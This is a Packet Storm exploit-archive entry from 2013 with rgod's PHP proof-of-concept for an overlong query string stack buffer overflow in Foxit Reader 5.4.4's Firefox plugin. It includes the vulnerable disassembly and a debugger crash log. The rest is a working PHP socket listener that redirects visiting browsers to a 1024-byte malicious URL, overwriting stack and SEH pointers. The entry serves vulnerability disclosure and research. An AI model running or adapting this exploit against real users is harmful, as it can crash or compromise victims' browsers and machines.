Foxit Reader 5.4.4.1128 Plugin For Firefox Buffer Overflow

2013-01-08T00:00:00
ID PACKETSTORM:119306
Type packetstorm
Reporter rgod
Modified 2013-01-08T00:00:00

Description

                                        
                                            `<?php  
/*  
Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong   
Query String Remote Stack Buffer Overflow PoC --------------------------- rgod  
  
(listener)  
  
Tested against Microsoft Windows  
Mozilla Firefox 17.0.1  
Foxit Reader 5.4.3.0920  
Foxit Reader 5.4.4.1128  
  
File: npFoxitReaderPlugin.dll  
Version: 2.2.1.530  
  
Product url: http://www.foxitsoftware.com/downloads/  
Last version setup file: FoxitReader544.11281_enu_Setup.exe  
  
Usage:  
Launch from the command line, then browse port 6666 with Firefox.  
You can test it also through this url:  
  
http://192.168.0.1/x.pdf?[A x 1024]  
  
File must be existing or the server should be responding with  
the proper Content-Type header.  
  
vulnerable code, npFoxitReaderPlugin.dll:  
  
;------------------------------------------------------------------------------  
L1000162F:  
push ebx  
push esi  
push edi  
mov edi,ebp  
or ecx,FFFFFFFFh  
xor eax,eax  
xor ebx,ebx  
xor esi,esi  
repne scasb  
not ecx  
dec ecx  
test ecx,ecx  
jle L100016E4  
L1000164A:  
mov al,[esi+ebp]  
mov word ptr [esp+18h],0000h  
cmp al,25h  
jz L10001661  
mov ecx,[esp+1Ch]  
mov [ebx+ecx],al  
jmp L100016CE  
L10001661:  
mov al,[esi+ebp+01h]  
cmp al,30h  
jl L1000166D  
cmp al,39h  
jle L1000167D  
L1000166D:  
cmp al,41h  
jl L10001675  
cmp al,46h  
jle L1000167D  
L10001675:  
cmp al,61h  
jl L100016C6  
cmp al,66h  
jg L100016C6  
L1000167D:  
mov dl,[esi+ebp+01h]  
inc esi  
inc esi  
lea ecx,[esp+10h]  
mov [esp+18h],dl  
push ecx  
mov al,[esi+ebp]  
lea edx,[esp+1Ch]  
push L100450D4  
push edx  
mov [esp+25h],al  
call SUB_L10006421  
mov eax,[esp+1Ch]  
lea ecx,[esp+24h]  
push eax  
push L100450D0  
push ecx  
call SUB_L100063CF  
mov eax,[esp+34h]  
mov dl,[esp+30h]  
add esp,00000018h  
mov [ebx+eax],dl  
jmp L100016CE  
L100016C6:  
mov ecx,[esp+1Ch]  
mov byte ptr [ebx+ecx],25h  
L100016CE:  
inc ebx  
mov edi,ebp  
or ecx,FFFFFFFFh  
xor eax,eax  
inc esi  
repne scasb  
not ecx  
dec ecx  
cmp esi,ecx  
jl L1000164A  
L100016E4:  
mov edx,[esp+1Ch]  
pop edi  
pop esi  
mov eax,00000001h  
mov byte ptr [ebx+edx],00h  
pop ebx  
pop ebp  
pop ecx  
retn  
;------------------------------------------------------------------------------  
  
this copy loop ends up in overwriting stack pointers, then   
(by attaching to plugin-container.exe):  
  
(f48.1778): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8  
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202  
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:  
10016852 8906 mov dword ptr [esi],eax ds:0023:41414141=????????  
...  
Attempt to write to address 41414141  
...  
  
also SEH pointers are overwritten  
*/  
  
error_reporting(0);  
  
set_time_limit(0);  
  
$port = 6666;  
  
$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".  
"Server: Apache\r\n".  
"Location: /x.pdf?".str_repeat("A",1024)."\r\n".  
"Content-Type: text/html\r\n\r\n";  
  
$____boom = "HTTP/1.1 200 OK\r\n".  
"Server: Apache\r\n".  
"Accept-Ranges: bytes\r\n".  
"Content-Length: 60137\r\n".  
"Content-Type: application/pdf\r\n".  
"Connection: keep-alive\r\n\r\n";  
  
$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);  
  
if (!$socket) {  
echo "$errstr ($errno)\n";  
} else {  
echo "Listening on public tcp port ".$port." \n";   
while ($conn = stream_socket_accept($socket)) {  
$line=fgets($conn);  
echo $line."\n";  
if (strpos($line,".pdf")){  
fwrite($conn,$____boom);  
}  
else {  
fwrite($conn,$____redirect);  
}  
fclose($conn);  
}  
fclose($socket);  
}  
?>  
  
  
`